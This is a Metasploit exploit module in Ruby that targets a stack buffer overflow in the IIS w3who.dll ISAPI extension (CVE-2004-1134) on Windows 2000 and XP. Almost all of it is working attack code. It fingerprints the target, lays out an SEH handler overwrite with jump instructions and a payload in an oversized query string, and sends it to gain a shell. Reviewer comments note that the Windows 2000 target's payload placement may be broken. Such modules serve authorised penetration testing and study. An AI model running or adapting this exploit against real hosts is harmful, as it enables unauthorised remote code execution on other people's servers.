##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
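class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  # XXX: Needs custom body check. HttpFingerprint = { :pattern => [ // ] }
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft IIS ISAPI w3who.dll Query String Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in the w3who.dll ISAPI
        application. This vulnerability was discovered by Nicolas
        Gregoire and this code has been successfully tested against
        Windows 2000 and Windows XP (SP2). When exploiting Windows
        XP, the payload must call RevertToSelf before it will be
        able to spawn a command shell.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2004-1134' ],
          [ 'OSVDB', '12258' ],
          [ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html' ],
          [ 'BID', '11820' ]
        ],
      'Privileged'     => false,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          # The payload is written immediately before the overwritten record
          # and reached by the fixed "jmp -641" in exploit(); that jump lands
          # 632 bytes before the record, so Space must stay in step with it.
          'Space'           => 632,
          # buf is sent as the raw query string, so NUL and the bytes a query
          # string parser splits or decodes on ('+', '&', '=', '%', LF, CR,
          # space) cannot appear in the payload.
          'BadChars'        => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
          'MinNops'         => 128,
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # 'Rets' => [ offset of the overwritten handler record within the
          # query string, address of a pop/pop/ret sequence in w3who.dll ].
          ['Automatic Detection', { }],
          ['Windows 2000 RESKIT DLL [Windows 2000]', { 'Rets' => [ 48, 0x01169f4a ] }], # pop, pop, ret magic
          ['Windows 2000 RESKIT DLL [Windows XP]', { 'Rets' => [ 748, 0x10019f4a ] }], # pop, pop, ret magic
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2004-12-06'))

    register_options(
      [
        OptString.new('URL', [ true, "The path to w3who.dll", "/scripts/w3who.dll" ]),
      ])
  end

  # Requests the configured URL and picks a target from the response.
  #
  # Returns targets[2] (Windows XP) when the body contains "Access Token"
  # and the Server header contains "5.1", targets[1] (Windows 2000) for any
  # other Server header, and nil when there is no response or the body does
  # not look like w3who.dll output.
  def auto_target
    res = send_request_raw(
      {
        'uri' => normalize_uri(datastore['URL'])
      }, -1) # NOTE(review): -1 presumably means no read timeout; confirm the check cannot hang
    http_fingerprint({ :response => res }) # XXX: Needs custom body match

    # Was a vulnerable system detected? "Access Token" is the only
    # body signature we have for w3who.dll.
    return nil unless res && res.body =~ /Access Token/

    # A "5.1" Server header (IIS 5.1, i.e. Windows XP) selects the XP
    # target; anything else, including a missing header, is treated as 2000.
    case res.headers['Server']
    when /5\.1/ then targets[2]
    else targets[1]
    end
  end

  # Appears when auto_target recognises a w3who.dll response, Safe otherwise.
  # Note that a host that never answers also yields Safe, since auto_target
  # collapses "no response" and "not w3who.dll" into nil.
  def check
    return Exploit::CheckCode::Appears if auto_target

    Exploit::CheckCode::Safe
  end

  # Builds and sends the overflowing query string.
  #
  # With off = Rets[0], the buffer is laid out as a classic handler-record
  # overwrite:
  #   off-4 .. off-1 : two NOPs then "jmp +4", skipping the address below
  #   off   .. off+3 : Rets[1] (pop/pop/ret) as a little-endian dword
  #   off+4 .. off+8 : "jmp -641", back into the payload placed before off-4
  # The payload is written so that it ends at off-4; the remainder of the
  # 8192-byte buffer is English filler free of the payload's bad chars.
  def exploit
    mytarget = target.name =~ /Automatic/ ? auto_target : target
    fail_with(Failure::NoTarget, "No valid target found") unless mytarget

    off = mytarget['Rets'][0]
    # jmp rel32 is 5 bytes; size the slice to the instruction so the buffer
    # keeps its 8192-byte length instead of growing by one.
    back_jmp = "\xe9" + [-641].pack('V')
    sc = payload.encoded

    buf = rand_text_english(8192, payload_badchars)
    buf[off - 4, 4] = make_nops(2) + "\xeb\x04"
    buf[off, 4] = [ mytarget['Rets'][1] ].pack('V')
    buf[off + 4, back_jmp.length] = back_jmp
    # NOTE(review): for the Windows 2000 target (off = 48) this index is
    # negative whenever the encoded payload is longer than 44 bytes, and
    # Ruby then places the payload at the tail of the buffer where the
    # back-jump cannot reach it. Verify that target against a live host.
    buf[off - 4 - sc.length, sc.length] = sc

    print_status("Sending request...")
    send_request_raw({
      'uri'   => normalize_uri(datastore['URL']),
      'query' => buf
    }, 5)

    handler
  end
end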